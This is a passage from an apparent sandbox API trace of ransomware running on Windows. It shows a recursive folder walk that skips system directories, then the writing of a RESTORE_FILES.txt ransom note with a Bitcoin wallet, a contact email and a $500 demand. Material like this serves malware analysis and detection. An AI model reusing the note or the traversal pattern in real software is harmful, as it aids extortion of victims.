lpOverlapped=0x0) returned 1 [0078.046] CloseHandle (hObject=0xd4) returned 1 [0078.047] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0078.047] lstrcmpiW (lpString1="Application Data", lpString2="Windows") returned -1 [0078.047] lstrcmpiW (lpString1="Application Data", lpString2="Program Files") returned -1 [0078.047] lstrcmpiW (lpString1="Application Data", lpString2="Program Files (x86)") returned -1 [0078.047] lstrcmpiW (lpString1="Application Data", lpString2="$Recycle.bin") returned 1 [0078.047] lstrcmpiW (lpString1="Application Data", lpString2="System Volume Information") returned -1 [0078.047] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data") returned 64 [0078.047] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0078.047] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0078.047] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\*") returned 66 [0078.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0xffffffff [0078.047] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0078.047] lstrcmpiW (lpString1="Apps", lpString2="Windows") returned -1 [0078.047] lstrcmpiW (lpString1="Apps", lpString2="Program Files") returned -1 [0078.047] lstrcmpiW (lpString1="Apps", lpString2="Program Files (x86)") returned -1 [0078.047] lstrcmpiW (lpString1="Apps", lpString2="$Recycle.bin") returned 1 [0078.047] lstrcmpiW (lpString1="Apps", lpString2="System Volume Information") returned -1 [0078.047] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps") returned 52 [0078.047] lstrcmpW (lpString1="Apps", lpString2=".") returned 1 [0078.047] lstrcmpW (lpString1="Apps", lpString2="..") returned 1 [0078.047] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*") returned 54 [0078.047] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0078.048] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.048] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.048] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.048] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.048] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.048] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\.") returned 54 [0078.048] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.048] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0078.048] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.048] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.048] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.048] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.048] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.048] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\..") returned 55 [0078.048] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.048] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.048] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0078.048] lstrcmpiW (lpString1="2.0", lpString2="Windows") returned -1 [0078.048] lstrcmpiW (lpString1="2.0", lpString2="Program Files") returned -1 [0078.048] lstrcmpiW (lpString1="2.0", lpString2="Program Files (x86)") returned -1 [0078.048] lstrcmpiW (lpString1="2.0", lpString2="$Recycle.bin") returned 1 [0078.048] lstrcmpiW (lpString1="2.0", lpString2="System Volume Information") returned -1 [0078.048] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0") returned 56 [0078.048] lstrcmpW (lpString1="2.0", lpString2=".") returned 1 [0078.048] lstrcmpW (lpString1="2.0", lpString2="..") returned 1 [0078.049] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*") returned 58 [0078.049] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0078.049] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.049] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.049] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.049] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.049] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.049] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\.") returned 58 [0078.049] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.049] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0078.049] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.049] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.049] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.049] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.049] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.049] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\..") returned 59 [0078.049] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.049] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.049] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0078.049] lstrcmpiW (lpString1="Data", lpString2="Windows") returned -1 [0078.049] lstrcmpiW (lpString1="Data", lpString2="Program Files") returned -1 [0078.049] lstrcmpiW (lpString1="Data", lpString2="Program Files (x86)") returned -1 [0078.049] lstrcmpiW (lpString1="Data", lpString2="$Recycle.bin") returned 1 [0078.049] lstrcmpiW (lpString1="Data", lpString2="System Volume Information") returned -1 [0078.049] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data") returned 61 [0078.049] lstrcmpW (lpString1="Data", lpString2=".") returned 1 [0078.049] lstrcmpW (lpString1="Data", lpString2="..") returned 1 [0078.050] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*") returned 63 [0078.050] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0078.051] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.051] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.051] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.051] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.051] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.051] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\.") returned 63 [0078.051] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.051] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0078.051] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.051] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.051] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.051] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.051] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.051] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\..") returned 64 [0078.051] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.051] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.051] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0078.051] lstrcmpiW (lpString1="CJW3O3KP.BX7", lpString2="Windows") returned -1 [0078.051] lstrcmpiW (lpString1="CJW3O3KP.BX7", lpString2="Program Files") returned -1 [0078.051] lstrcmpiW (lpString1="CJW3O3KP.BX7", lpString2="Program Files (x86)") returned -1 [0078.051] lstrcmpiW (lpString1="CJW3O3KP.BX7", lpString2="$Recycle.bin") returned 1 [0078.051] lstrcmpiW (lpString1="CJW3O3KP.BX7", lpString2="System Volume Information") returned -1 [0078.051] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7") returned 74 [0078.051] lstrcmpW (lpString1="CJW3O3KP.BX7", lpString2=".") returned 1 [0078.051] lstrcmpW (lpString1="CJW3O3KP.BX7", lpString2="..") returned 1 [0078.051] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*") returned 76 [0078.051] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0078.051] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.051] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.052] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.052] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.052] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.052] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\.") returned 76 [0078.052] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.052] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.052] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.052] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.052] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.052] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.052] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.052] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\..") returned 77 [0078.052] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.052] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.052] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.052] lstrcmpiW (lpString1="6NG60CXZ.9GJ", lpString2="Windows") returned -1 [0078.052] lstrcmpiW (lpString1="6NG60CXZ.9GJ", lpString2="Program Files") returned -1 [0078.052] lstrcmpiW (lpString1="6NG60CXZ.9GJ", lpString2="Program Files (x86)") returned -1 [0078.052] lstrcmpiW (lpString1="6NG60CXZ.9GJ", lpString2="$Recycle.bin") returned 1 [0078.052] lstrcmpiW (lpString1="6NG60CXZ.9GJ", lpString2="System Volume Information") returned -1 [0078.052] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ") returned 87 [0078.052] lstrcmpW (lpString1="6NG60CXZ.9GJ", lpString2=".") returned 1 [0078.052] lstrcmpW (lpString1="6NG60CXZ.9GJ", lpString2="..") returned 1 [0078.052] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\*") returned 89 [0078.052] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.053] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.053] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.053] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.053] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.053] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.053] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\.") returned 89 [0078.053] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.053] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.053] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.053] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.053] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.053] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.053] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.053] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\..") returned 90 [0078.053] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.053] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.053] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.053] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="Windows") returned -1 [0078.053] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="Program Files") returned -1 [0078.053] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="Program Files (x86)") returned -1 [0078.053] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="$Recycle.bin") returned 1 [0078.053] lstrcmpiW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="System Volume Information") returned -1 [0078.053] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec") returned 142 [0078.053] lstrcmpW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2=".") returned 1 [0078.053] lstrcmpW (lpString1="goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec", lpString2="..") returned 1 [0078.053] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*") returned 144 [0078.053] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0078.054] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.054] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.054] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.054] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.054] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.054] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\.") returned 144 [0078.054] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.054] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0078.054] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.054] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.054] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.054] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.054] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.054] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\..") returned 145 [0078.054] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.054] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.055] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0078.055] lstrcmpiW (lpString1="Data", lpString2="Windows") returned -1 [0078.055] lstrcmpiW (lpString1="Data", lpString2="Program Files") returned -1 [0078.055] lstrcmpiW (lpString1="Data", lpString2="Program Files (x86)") returned -1 [0078.055] lstrcmpiW (lpString1="Data", lpString2="$Recycle.bin") returned 1 [0078.055] lstrcmpiW (lpString1="Data", lpString2="System Volume Information") returned -1 [0078.055] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data") returned 147 [0078.055] lstrcmpW (lpString1="Data", lpString2=".") returned 1 [0078.055] lstrcmpW (lpString1="Data", lpString2="..") returned 1 [0078.055] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\*") returned 149 [0078.055] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0078.056] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.056] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.056] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.056] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.056] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.056] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\.") returned 149 [0078.056] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.056] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.056] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.056] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.056] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.056] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.056] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.056] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\..") returned 150 [0078.056] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.056] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.056] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0078.056] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0078.056] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\RESTORE_FILES.txt") returned 165 [0078.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\Data\\CJW3O3KP.BX7\\6NG60CXZ.9GJ\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\Data\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\data\\cjw3o3kp.bx7\\6ng60cxz.9gj\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\data\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0078.057] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.057] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0078.058] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.058] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.058] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.058] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0078.058] CloseHandle (hObject=0x15c) returned 1 [0078.058] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 